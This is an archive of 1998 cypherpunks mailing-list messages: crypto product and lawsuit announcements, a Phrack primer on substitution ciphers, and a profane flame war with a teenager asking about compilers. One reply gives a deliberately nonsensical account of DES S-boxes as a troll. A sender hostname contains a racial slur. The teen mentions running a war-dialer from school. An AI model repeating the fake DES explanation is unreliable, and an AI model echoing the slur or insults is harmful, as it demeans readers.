was tuned to this station and then bust in the doors.

The only difference with the Sovs and Cubans and Berkeleyites would be the
reasons the broadcasts were illegal to listen to.

--Tim May

"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Mon, 22 Jun 1998 08:19:11 +0800
To: cypherpunks@Algebra.COM
Subject: #cypherpunks open
Message-ID: <3.0.2.32.19980621170237.00942410@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



#cypherpunks is open on EFnet.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred

   "I do believe that where there is a choice only between cowardice and
    violence, I would advise violence." Mahatma Gandhi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Geoffrey C. Grabow" <gcg@ibm.net>
Date: Tue, 30 Jun 1998 01:17:17 +0800
To: cypherpunks@toad.com
Subject: Finally... a One-Time-Pad implementation that works!!!
Message-ID: <Version.32.19980627174733.00f29ee0@pop6.ibm.net>
MIME-Version: 1.0
Content-Type: text



-----BEGIN PGP SIGNED MESSAGE-----

TriStrata has announced that is has a product that provides OTP without the
pad distribution problem.  The product also has a unique key-recovery
system.  Check out:


http://www.tristrata.com

for details.


****************************************************************************
*************
PGP 5.5.3 Fingerprint: 15B3 DDC1 93BB 4BDF  4DFD 1B27 12A1 E0C4
****************************************************************************
*************


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.5.3i for non-commercial use <http://www.pgpi.com>

iQEVAwUBNZVo5dc2wHb8nZI1AQFqngf/bCJVbMQX/5sYb181CLONmqWjPzhQ66Ef
HoyPqxRzEyq4FSWnIuQODH/YTeyyQROUqCZGhC19v8PCiZpI1ynSvn4i+Zcjv9I0
OZBThzKayNoMne7TkNr49Ah9BwDK6XuwS9bns1xM65zfKLpvKP2gboWkADD52K4w
eUuJx/cTaR7PgdO/q6nrVRNq1jlaJsFBKGt2q5E1S12ZK1nA+mpKAS95XMgr2IMx
5/wJ+jsOIUTn2gWR64nhluOgmcACeIVsiRlsGqfUdL8gJHAl0gaQ7E1+HSOBx60K
Ur5x5MzQKBKlWcoDaEXB1AsICW2enwdGVOxPBklq1CbcQxFXdBj1DQ==
=vZmi
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: one4evil@juno.com (Nalus Optic)
Date: Mon, 1 Jun 1998 12:18:08 -0700 (PDT)
To: cypherpunks@toad.com
Subject: I need a compiler!
Message-ID: <19980601.031903.11638.0.one4evil@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Cypherpunks,
	
	Tis I, D, again...I just have one other question...Could some of
you tell me what C compilers you use...Also, could you just tell me every
program you would have that has anything to do with crypto if you had the
cash?  I guess one would need a C compiler, a hex editer maybe, are there
any crypto programs that are sort of like templates, where you set the
paramiters and the program compiles the encryption for you...Pipe dream I
am sure...

	That is about it...

			D.

_____________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com
Or call Juno at (800) 654-JUNO [654-5866]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 31 May 1998 21:30:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: printed materials exports
Message-ID: <199806010430.GAA16099@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



"A printed book or other printed material setting
forth encryption source code is not itself subject
to the EAR...." 

        





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: one4evil@juno.com (Nalus Optic)
Date: Mon, 1 Jun 1998 16:17:09 -0700 (PDT)
To: J-Dog@Elitehackers.org
Subject: Re: I need a compiler!
In-Reply-To: <Pine.LNX.3.96.980601144745.16163A-100000@nigger.elitehackers.org>
Message-ID: <19980601.071648.10254.1.one4evil@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


J-Dog

>who says I am socalled "elite"?

Gee, your 'handle' is J-Dog...And your sending your mail through
EliteHackers.org...Very original...I think have been to your web site
once or twice...The EliteHackers.org that is...

>WOW.. A dual PII 266... then you will really be elite... because you
>know.. if you have a fast machine, you don't ahve to know shit.. you can
>just  fake it.. because your machine will cover up for you..... fuqin
>moron...

First...I am not a hacker and don't pretend to be...I phreak a little and
like phones and shit...I subscribe to Telecom Digest and just like to
play with phones...I like to blow shit up for fun so you could say I am a
pyro...I got five bitches on my dick so you could call me a pimp...But I
never said I was a hacker...I just like to know about how shit
works...And in order to exploit any system, for fun or money or super
3l33t props, you gots to know the system...I want to put linux on my
system because linux does have bugs and quirks and you have to know how
to do more than click a mouse button for the shit to work.

>bwhahahhaha....if you can not detect the sarcasm in here, then damn, you
>are a bigger idiot than I thought..... geez man..

Ya, sure...Sarcasm...You laugh at me but dude...William is to busy with
Netscape trying to dick him up the ass for me to call him again...

>> And you know this...MAN!  I am wanting to write my own supper
program...I
>> want to take all the good h/p/v/c apps out there and make a nice point
> >and click interface for them all...one in linux and one in win (
...fuck
>> the mac people... ) Put it all on a CD and send free copies to all the
>> cool hackers out there...Sort of a library O' chaos...Of coarse, I
would
>> not send one to just anyone...r00t would get a copy...I would send
Eric B
>> one just for kicks...Then I would send one to Death Vegi and the rest
of
>> the cDc...They got the cool philes....Anywhoo...Let me know who bill
is.
>Good Yogi, and while your att it, stop world Hunger, Racism, and poverty
>with your uberhacker program...

Again, you laugh at me for sarcasm....

But back to the real problem...yes, gcc would be ideal...How ever...I am
not running Linux as of yet...so do you or any of you know any OTHER
WINDOWS BASED COMPILERS that are worth a shit...I know it is a stretch
but god...

And J-Dog, what is up with the fucked up lingo...This ain't the movies...



_____________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com
Or call Juno at (800) 654-JUNO [654-5866]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: one4evil@juno.com (Nalus Optic)
Date: Mon, 1 Jun 1998 17:19:45 -0700 (PDT)
To: J-Dog@Elitehackers.org
Subject: Re: I need a compiler!
In-Reply-To: <Pine.LNX.3.96.980601163240.16571A-100000@nigger.elitehackers.org>
Message-ID: <19980601.081903.10230.0.one4evil@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Ok, this is starting to get really odd.  I am not a hacker...I DO NOT
want to make some supper program...IT WAS A CRACK BASED ON WHAT YOU SAID
ABOUT WIDOZE CODE!!!  I don't know shit about hacking other than how to
maybe use a cheese scanner like 'Phonetag' (which I have set up at school
so that I don't get busted useing it at home.) I mean what is the
argument here? 
Also, you keep putting things in here like:

> uberl33t
> k-rad	
> /<-rad

Well, what the hell is up with that...I don't talk like that...Do you
talk like that?  Do you walk up to your local dealer and say you want
some K-rad KB?  No!  You just say you want a fat once of KB!  You don't
fuck around.

>Not running linux as of yet? hehe so when are you gong to do a search
for
>linux.exe and start to run it?.. as soon as your superkool P2 266 gets
>here... wowwie... I am impressed...... Hey DK.. pass me another beer...

Well, I have no net access...Boy that's 3L33T...and when I tried last
time I had access, I kept having trouble makeing the boot disk...Maybe
you can explane it to me...You do know stuff about linux and for that I
ask a question...The page I was trying to get it from said that I needed
to save some program ( this has been like eight months ago ) and then put
the program, which was 1.44 mb, onto a floppy then boot your computer off
the floppy...I put in a brand new, unnamed formated disk and it said that
there was not enough disk space...I dont' have a damn clue as to why it
would not work...Also, with my thirst for info, I am going to get the QUE
linux book that comes with Linux 3.0.8 (?) slackware, redhat, a disk of
misc. utilitys and a disk of net utilitys...
I don't know why we are bitching at each other...You hack, I don't, you
use jargon, I don't, I can spell and type, you can't...Where is the
problem?  Anyone back me up on this?
I really don't like to fight with people I don't know...So what does the
J stand for?  Sort of ironic, my initals are JD, Jordan David...Fucked
up, O my brothers...


		D.

_____________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com
Or call Juno at (800) 654-JUNO [654-5866]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: one4evil@juno.com (Nalus Optic)
Date: Mon, 1 Jun 1998 18:36:12 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <19980601.093541.11502.0.one4evil@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Ok, I was just going through Phrack 51again and found this...I don't know
if you people care or are seeing it for the 51 time, but if you want the
whole thing, e-mail me or just go do a search for Phrack and look at
there archives...There is a lot more to the artical, but this little bit
lets you know what it is about.
		
			D.



---[  Phrack Magazine   Volume 7, Issue 51 September 01, 1997, article 13
of 17


-------------------------[  Monoalphabetic Cryptanalysis (Cyphers, Part
One)


--------[  Jeff Thompson aka 'Mythrandir' <jwthomp@cu-online.com>



Written for Phrack and completed on Sunday, August 31st, 1997.


---------

First a quick hello to all of those I met at DefCon this year.  It was 
incredible fun to finally put faces to many of the people I have been
talking 
with for some time.  It was truly was a treat to meet so many others who
are 
alive with the spirit of discovery.  

----------


This is the first in a series of articles on Cryptology that I am
writing.  
The goals of these articles will be to attempt to convey some of the
excitement
and fun of cyphers.  A topic of much discussion in regards to
cryptography 
currently, is about computer based cyphers such as DES, RSA, and the PGP 
implementation.  I will not be discussing these.  Rather, these articles
will 
cover what I will term classical cryptology.  Or cryptology as it existed

before fast number crunching machines came into existance.  These are the
sorts
of cyphers which interested cryptographers throughout time and continue
to be 
found even to this very day.  Even today, companies are producing
software 
whose encryption methods are attackable.  You will find these commonly
among 
password protection schemes for software programs.  Through the course of
these
articles I will explain in practical terms several common cypher types
and 
various implementations of them as well as cryptanalytic techniques for 
breaking these cyphers.

Creating cyphers is fun and all, but the real excitement and often times
tedium
is found in Cryptanalysis.  Many of the ideas presented in these articles
will 
based on three sources.  The following two books: The Codebreakers by
David 
Kahn (ISBN: 0-684-83130-9) and Decrypted Secrets by F.L. Bauer 
(ISBN: 3-540-60418-9).  Both authors have put together wonderful books
which 
both cover the history and methods of Cryptology.  Do yourself and the
authors 
a favor and purchase these books.  You will be very pleased with the lot.
 
Finally, a miniscule amount of these articles will be written based on my
own 
personal experience.  

The fun is in the journey and I welcome you on what is certain to be an 
interesting trip.  Please feel free to raise questions, engage me in 
discussions, correct me, or simply offer suggestions at
jwthomp@cu-online.com.
Please be patient with me as I am traveling extensively currently, and
may be 
away from the computer at length occasionally.  

Out the door and into the wild...


--Monoalphabetic Cyphers

Monoalphabetic cyphers are often currently found in simple cryptograms in
books
and magazines.  These are just simple substitution cyphers.  This does
not 
mean that they are always simple for the beginning amateur to solve.

Three common monoalphabetic cyphers which are used are substitution,
cyclical, 
and keyed cyphers.


-Substitution Cyphers 

By taking an alphabet and replacing each letter with another letter in a 
unique fashion you create a simple monoalphabetic cypher.  

Plaintext Alphabet	A B C D E F G H I J K L M N O P Q R S T U V W X
Y Z
Cypher Alphabet		Z I K M O Q S U W Y A C E B D F H J L N P
R T V X G


Plaintext Message

The blue cow will rise during the second moon from the west field.

Cyphertext Message

nuo icpo kdt twcc jwlo mpjwbs nuo lokdbm eddb qjde nuo toln qwocm.


-Cyclical Cyphers

By taking an alphabet and aligning it with a rotated alphabet you get a 
cyclical cypher.  For example:

Plaintext Alphabet	A B C D E F G H I J K L M N O P Q R S T U V W X
Y Z
Cypher Alphabet		N O P Q R S T U V W X Y Z A B C D E F G H
I J K L M


Indeed, you may recognize this cypher as a ROT13 which is commonly used
on 
news groups to obscure messages.


-Keyed Cypher

Another way to create a monoalphabetic cypher is to choose a keyword or
phrase 
as the beginning of the cypher alphabet. Usually, only the unique letters
from 
the phrase are used in order to make sure the plaintext to cyphertext
behaves 
in a one to one fashion.

For example:

Plaintext Alphabet:	A B C D E F G H I J K L M N O P Q R S T U V W
X Y Z
Cypher Alphabet		L E T O S H D G F W A R B C I J K M N P Q
U V X Y Z

The passphrase in this cypher is "Let loose the dogs of war"  The
advantage of 
such a system is that the encryption method is easy to remember.  Also, a

method of key change can be created without ever having to distribute the
keys.
For example, one could use the 4 words at a time of some piece of
literature.  
Every message could use the next four words.  Indeed, this change could
occur 
more frequently, but that is a subject for another article. 



_____________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com
Or call Juno at (800) 654-JUNO [654-5866]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: one4evil@juno.com (Nalus Optic)
Date: Mon, 1 Jun 1998 18:58:38 -0700 (PDT)
To: pooh@rboc.net
Subject: Re: I need a compiler!
In-Reply-To: <Pine.LNX.3.96.980601163240.16571A-100000@nigger.elitehackers.org>
Message-ID: <19980601.095731.12158.0.one4evil@juno.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 01 Jun 1998 21:37:58 -0400 "Robert A. Costner" <pooh@rboc.net>
writes:
>People are making fun of you for the following reasons:
>
> * The 'C' compiler comes with the operating system

What OS?

> * Your email address is well... you look at it :)

I am a satanist, sorry...

> * Most of the crypto programs are GPL, which is not freeware, but 
>   you probably would not know the difference.  (You don't need cash)

I don't care if I have to pay...I was just asking for everyone's oppinion

> * You sound like you are under 25

17...

> * You use vulgarities (Juno kicking my ass, net access blows)

And always will...Sorry, nothing gets the point across like a good
vulgarity

> * You can't spell.  OK w/o the other stuff.

I know I can't spell...But I am doing better than J-Dog, what other
stuff?

> * Your dual PII-266 that you need, seems overblown to those running
>   386-25Mhz, or even 10Mhz systems.

Hey, at least I didn't say I wanted my oun cray or a duel 400 :)

> * You don't seem to know what PGP is.

PGP:  Pretty Good Privicy...Not for export, puplic encryption, you
puplish your key then people can send you encrypted files...I think...

>Try reading the list for a month before you make your next message.  
>It
>might work better.  Or just get PGP and learn how to use it without 
>asking
>the list.  Besides, my domain is more elite than the other guy's 
>hackerorg
>domain.

I have been on for about a week...My welcome message got no replys, all I
seam to get are political messages, I have seen one question about
crypto, and the reply was half joke...I DO NOT HAVE NET ACCESS!  how do I
get pgp with out net access...I just wanted to know what everyone else
was useing...What is up with J-Dog jumping my shit (sorry) with this
stuff about, "Then again, if I was to say linux to you, you would prolly
run in ph33r"?  I know linux, I want linux, you have read the other posts
so I won't go into it...I guess i am just on the wrong list...I sent out
a post befor about are there any better 'newbie' lists on crypto but got
no responce...oh well.

		D.

p.s, I like Juno... :(


_____________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com
Or call Juno at (800) 654-JUNO [654-5866]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 1 Jun 1998 08:38:44 -0700 (PDT)
To: cypherpunks@toad.com
Subject: RSA, NAI Settle Suit
Message-ID: <199806011538.LAA11092@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


PR Newswire, June 1, 1998 [Excerpt]:

RSA Data Security and Network Associates Announce Settlement of Lawsuit; 
Network Associates Licenses RSA Crypto-security Software

    Redwood City and Santa Clara, Calif., June 1 -- RSA Data Security, 
Inc. and Network Associates  today announced that the companies have 
settled patent infringement and copyright lawsuits brought by RSA 
against Network Associates and its subsidiaries PGP, Inc., and Trusted
Information Systems (TIS).  In addition, Network Associates entered 
into a new royalty-bearing license for RSA's crypto-security engines, 
providing Network Associates with rights to include RSA components 
within a number of Network Associates, PGP, and TIS products.

    Under the terms of the settlement agreement, Network Associates 
will draw on a previously established escrow set at the time of the 
PGP acquisition to pay RSA an undisclosed sum to settle past issues and 
for legal fees.  As a result of today's settlement agreement, three 
federal actions and a court-ordered arbitration related to the dispute 
have been resolved.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Mon, 1 Jun 1998 09:21:55 -0700 (PDT)
To: Nobuki Nakatuji <bd1011@hotmail.com>
Subject: Re: When write high-speed implementation,
In-Reply-To: <19980530042752.25126.qmail@hotmail.com>
Message-ID: <3572D417.5145276A@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


It's actually expressed as a set of complex numbers with lots of data in the
imaginary side.  These are displayed with fixed point decimals (or static
point decimals) expressing a width and height for the rectangle hence the term
S-Box.  Since DES works on 64 bit blocks using a 56 bit key, you can use either
56 decimal places, or 64 for more accuracy, but far less speed.

For purposes of optimization to extreme high speed, you should take your key
and sort it (be sure to use Quick Sort here, and not bubble sort!), that is put
all the 1 bits to the right, all the 0 bits to the left, and the naughty bits
in your head.  Then take the result and express it as 2^X-1, and extract X. 
Once you have X, repeat the process until X=2.

With me so far?  Good, now you have to extract the naughty bits from your mind,
and let N express them.  Your S boxes are now comprised of X+Ni which you can
simply express as 2+Ni.  Now, if you recall, Ni is the symbol for nickel, which
is what this algorithm is worth $2.05 payable in Monopoly dollars.  If you've
been following the news, you'll know that Microsoft is a monopoly and therefore
weighs the same as a duck.  Since ducks float, and wood also floats, ducks must
weigh the same as wood, and therefore are witches.  Multiply this by the flight
speed of an unladen African swallow, and divide it by the flight speed of a
laden european swallow, then add your favorite color, and substract your name.

Okay, so that's the high-speed write implementation, don't forget that the high
speed read implementation is the opposite of the write, so reverse the sort and
this time, make sure you use random sort. (That is toss the bits up randomly,
and if they wind up in the order you wanted, you're done, otherwise keep
tossing.)  And don't forget that tossed bits require Ranch dressing or Italian,
with onion crutons, but never Russian (because the USSR never used DES.)

Now that we've told you the secret of high speed DES, your assignment is to
come back in a week with source code to the above written in SNOBOL which can
run on CP/M 6502 machines.  Of course you'll need to roll your own CP/M 6502 OS
as well as a SNOBOL compiler and assembler, but heck, that's easy.  Oh, one
catch, make sure your CP/M runs on all C64 and Apple II's, or you can't
properly consider it a portable DES implementation.

Good luck.

[ Snicker, snicker, ROTFLMAO!  I wonder how long it will take him to figgure
out that he's being trolled... heh... ]

Nobuki Nakatuji wrote:
> 
> When write high-speed implementation,
> Is S-box written by hexadecimal or
> written by decimal?
> Thanks.

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 1 Jun 1998 10:33:08 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Counterpane Cracks MS's PPTP
Message-ID: <Version.32.19980601122218.00fbc410@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.counterpane.com/pptp.html


Thanks to GM




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: J-Dog <J-Dog@Elitehackers.org>
Date: Mon, 1 Jun 1998 13:35:07 -0700 (PDT)
To: Nalus Optic <one4evil@juno.com>
Subject: Re: I need a compiler!
In-Reply-To: <19980601.031903.11638.0.one4evil@juno.com>
Message-ID: <Pine.LNX.3.96.980601132520.15727B-100000@Nigger.EliteHackers.org>
MIME-Version: 1.0
Content-Type: text/plain


gee, gcc seems to always do teh trick for me when I want to compile some
C.....
Then again, if I was to say linux to you, you would prolly run in ph33r
... so, why don't you call bill up and ask him to send you a free version
of Visual C++.... so that you too can crank out useless winblowz code...
Latez
JD
On Mon, 1 Jun 1998, Nalus Optic wrote:

> Cypherpunks,
> 	
> 	Tis I, D, again...I just have one other question...Could some of
> you tell me what C compilers you use...Also, could you just tell me every
> program you would have that has anything to do with crypto if you had the
> cash?  I guess one would need a C compiler, a hex editer maybe, are there
> any crypto programs that are sort of like templates, where you set the
> paramiters and the program compiles the encryption for you...Pipe dream I
> am sure...
> 
> 	That is about it...
> 
> 			D.
> 
> _____________________________________________________________________
> You don't need to buy Internet access to use free Internet e-mail.
> Get completely free e-mail from Juno at http://www.juno.com
> Or call Juno at (800) 654-JUNO [654-5866]
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 1 Jun 1998 11:26:58 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Foundation for Information Policy Research
Message-ID: <199806011826.OAA15687@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Source: http://www.ntk.net/fipr/

Subject: URGENT: press release - FIPR
Date: Thu, 28 May 1998 16:52:16 +0100
From: Ross Anderson 


    Title: New Independent Research Foundation Backed by Microsoft

                Embargoed until 11.00 Friday 29th May

Too often, policy issues relating to information technology are
seperately debated by two distinct grouups: technology experts and
those focused on social concerns.  Policy makers face the challenge of
reconciling the seperate debates in areas where technology is often
evolving very quickly. A new research foundation aims to provide clear
advice that spans this gap and is independent of vested interests.

The Foundation for Information Policy Research will fund research into
how information technology affects society. It is launched at a press
conference on Friday 29th May at 11.00 am. (1)

Microsoft has contributed a six-figure sum to cover the launch costs.
Internet service providers Poptel and Demon are also supporting the
Foundation. Its independence will be guaranteed, however, by a board
of trustees. (2) In the medium term it will be supported by
subscriptions from a range of firms in commerce and industry.

The goal of the Foundation is to promote research and understanding of
the effects, and the likely future effects, of IT on society. Its
areas of investigation include: (3)

 * the regulation of electronic commerce;
 * consumer protection;
 * data protection and privacy;
 * copyright;
 * law enforcement;
 * evidence and archiving;
 * electronic interaction between government, businesses and individuals;
 * the extent to which various information technologies discriminate
   against the less advantaged members of society; and
 * the new risks that computer and communication systems pose to
   life, health and economic well-being

The Foundation will also provide a valuable resource for the press as
it will be able to put journalists in touch with a wide range of
experts who can explain IT issues as they arise.

Contact: Caspar Bowden (Director of the Foundation) 0171 837 8706
         Ross Anderson (Chair of the Foundation)    01223 334733

QUOTES

The Director of the Foundation, Caspar Bowden, said: ``The IT policies
(and failures) which the current government inherited, and the
decisions which will be made by them in the future, will have
far-reaching effects on who society's winners and losers will be.  We
have a duty to prevent technological innovation and development taking
place at the expense of the poor, the old, the sick and the disabled.
We believe that so long as we understand the social and policy
implications of new technical innovations, we can make IT into a means
to facilitate social inclusion. The Foundation's mission will be to
achieve and to spread that understanding.''

The Managing Director of Microsoft UK, David Svendsen, said: ``It's
important that we contribute to a broad and informed public discussion
on these information society issues.''

The Chair of the Foundation, Ross Anderson of Cambridge University,
said: ``We welcome this new source of funding for IT related
research. An increase in the diversity of funding sources is almost
always a good thing, and the Foundation will be particularly valuable
as much of the available IT funding is directed to very short-term and
narrowly technical agendas.''

NOTES

(1) The press conference is at the "Scrambling for Safety"
conference, at the Bloomsbury Theatre, University College, London.
URL: 

(2) The Foundation's Director and full-time CEO, Caspar Bowden, has
for the last three years been running Qualia, a consultancy business
specialising in internet implementations. Before that he was a
financial strategist with Goldman Sachs. He also researched IT and
communications issues for Scientists for Labour. 

Its chair, Ross Anderson, is a faculty member at Cambridge University
Computer Laboratory and has done extensive research on topics related
to electronic commerce.

BACKGROUND

The "Millennium Bug" - the problem that many computers cannot deal

correctly with the date roll-over from 1999 to 2000 - threatens to
cause havoc with many systems and has been declared a national
emergency by the Prime Minister.

Another problem that has worried policymakers and concerned citizens
is that new developments in IT may discriminate against the less well
off members of society.  For example, the current mechanisms for
electronic commerce depend on consumers using their credit cards to
order goods and services over the net. They often get a big discount
for buying this way; but people without credit cards may lose out.

The first task that the Foundation has set itself is to examine the
underpinnings of electronic commerce. The European Commission has
recently published a draft Directive on this subject and will launch a
period of public consultation at the same conference at which the
Foundation itself will be launched. (The draft directive is at
[missing].)

Other topics which the Foundation plans to investigate include:

* the maintenance of public records in electronic form. We do not
 fully understand how to ensure that word processor files and other
 electronic documents created today can be safely stored for many
 years, and reliably made available in the future. This affects not
 just the new Freedom of Information Act, but also the work of future
 librarians and historians.

* the development of copyright law. There are some industry proposals
 which would restrict the ability of libraries to lend out digital
 works. Will this mean the end of the public library, as more and more
 books, videos and other material become digital? What are the
 implications for schools and universities? What are the implications
 for the public, if all major sports events in future are pay-per-view?
 Are these developments inevitable, or is there something we can do
 about them?

* the introduction of electronic communication between the citizen and
 the government has the potential to cut queues and the frustration of
 dealing with people on the phone. However, are these changes
 intrinsically more likely to favour the articulate, and to bring the
 most benefit to well-off people with their own computers? What
 technical developments are reasonably possible to ensure that all
 citizens get a fair deal?

* the previous government's proposal for a "personal signature card"
 that would give access to all government services had a distinct
 flavour of an ID card. Are such developments necessary, or can we
 find workable alternatives?

* the police are concerned about the spread of prepaid mobile phones,
 which are increasingly used by stalkers and extortionists. However, if
 they are banned, then how would people without credit cards obtain a
 mobile phone service?

* there have been many disputes in the past over "phantom withdrawals"
 from bank cash machines, and banks have defended themselves by
 claiming that their computers cannot be wrong. How can this approach
 work when millions of merchants are selling services through a wide
 variety of computer systems? What will consumer rights amount to in
 the information age?

* the failure of government computer systems - whether spectacular
 failure due to the millennium bug, or the continuing sporadic
 failures in the NHS - does most harm to pensioners, the disabled,
 single mothers, the unemployed and people on NHS waiting lists (who
 are typically elderly, female and working class). How can we
 encourage best engineering practice in the public sector?

- - - ends - - 

Thanks to Danny O'Brien, UK Crypto

Story: http://www.wired.com/news/news/politics/story/12624.html

Web site under construction: http://www.fipr.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs@aol.com
Date: Mon, 1 Jun 1998 12:09:06 -0700 (PDT)
To: Cypherpunks@toad.com
Subject: Nobody comes up with a great point!
Message-ID: <9082dcf2.3572fc2e@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Unfortunately, he didn't seem to want to share it with the Cypherpunks.

Nobody - << >> Of course, I do admit, that I do speak from a left POV.

Which one? >>

Mine.


<< There are so many left POVs! >>

Correctamundo!  We aren't a bunch of brain-washed DittoHeads like the right
is.  :-)

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Angelos D. Keromytis" <angelos@dsl.cis.upenn.edu>
Date: Mon, 1 Jun 1998 12:58:59 -0700 (PDT)
To: coderpunks@toad.com
Subject: KeyNote v0.1 Release Announcement
Message-ID: <199806011956.PAA12769@adk.gr>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: coderpunks@toad.com
Subject: KeyNote v0.1 Release Announcement
Cc: cypherpunks@toad.com
Date: 06/01/98, 15:56:45


KeyNote is a trust-management system, designed on the same principles
as PolicyMaker, but simpler and better-defined. This is the first
public release, and although the code has been tested, it is by no
means guaranteed bug-free (but then, what is). That said, you can get
a copy from

	   http://www.cis.upenn.edu/~angelos/keynote-0.1.tar.gz

 -Angelos

PS. From the README file:

There should be a real README file here, but in the meantime read
draft-angelos-spki-keynote-01.txt for the spec of KeyNote.

There's much to be done yet to improve the user interface(s). Signature      
verification is (deliberately) missing from this release, but the next one
will have it. The hooks are obvious in the code (search for XXX in
parse_assertion.c).

The makefile creates the libkeynote.a library which can be linked with other
applications. The program keynote-verify can be used to verify a request,
given a set of assertions and an environment. There will be a man page
in the next release both for the library and the program, along with some
sort of graphical UI to make assertion generation (including signing) easier.

For any questions, comments, bug reports, praise, or anything else you have
in mind, contact me at angelos@dsl.cis.upenn.edu

Angelos D. Keromytis
May 31 1998

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBNXMHfr0pBjh2h1kFAQElOgP9FyKPDQPvctQyJLl5djz4xj/edgRgQrlb
YmqwVQqGrKKC/KrgUbu/A6c/RyqT1l1/nk9U4pONQaJoAtT0pQcgpYISQ2Ji/0JY
tG8y+r+WqhWElgUuPxZff5jH5V3mbCDInKoe4BvkE0wwnW7QvwCSVa/nP/Ecs+1e
KpiewSL6Ug8=
=0f31
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Mon, 1 Jun 1998 14:38:44 -0700 (PDT)
To: John Young <jya@pipeline.com>
Subject: Re: Counterpane Cracks MS's PPTP
In-Reply-To: <Version.32.19980601122218.00fbc410@pop.pipeline.com>
Message-ID: <199806012143.QAA018.23@geiger.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <Version.32.19980601122218.00fbc410@pop.pipeline.com>, on 06/01/98 
   at 12:23 PM, John Young <jya@pipeline.com> said:


>http://www.counterpane.com/pptp.html

>Thanks to GM


<sig> when will people learn?

Microsoft is *incapable* and *unwilling* to provide even nominal security
for it's platforms.

Several problems that exist:

Technical Ability -- Microsoft is seriously lacking in the technical
know-how when it comes to cryptology and data security.

Corporate Mentality -- Microsoft does not have the mentality needed to
produce secure products. This is a company that has historically shipped
poorly designed, bug filled products out the door. Bugs are not seen as a
problem but as an opportunity to sell upgrades. While this has done them
well in selling their overpriced GameBoys (the sheeple never cease to
disappoint me) it is *not* the environment for developing secure products.


Previous security foobars by M$:

NT C2 <---- LOL!!!

Active X <---- Who was the brain child that though *that* up?

Auto-Launch attached binaries in E-Mail <-- Can we say GoodTimes?

Crypto-API <--- Right I would *trust* that. Honest. :)

TCP/IP Stack <--- Too many flaws to list.


Why would anyone trust these simpletons to produce any type of security
product?


- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://users.invweb.net/~whgiii/pgp.html
- ---------------------------------------------------------------
 
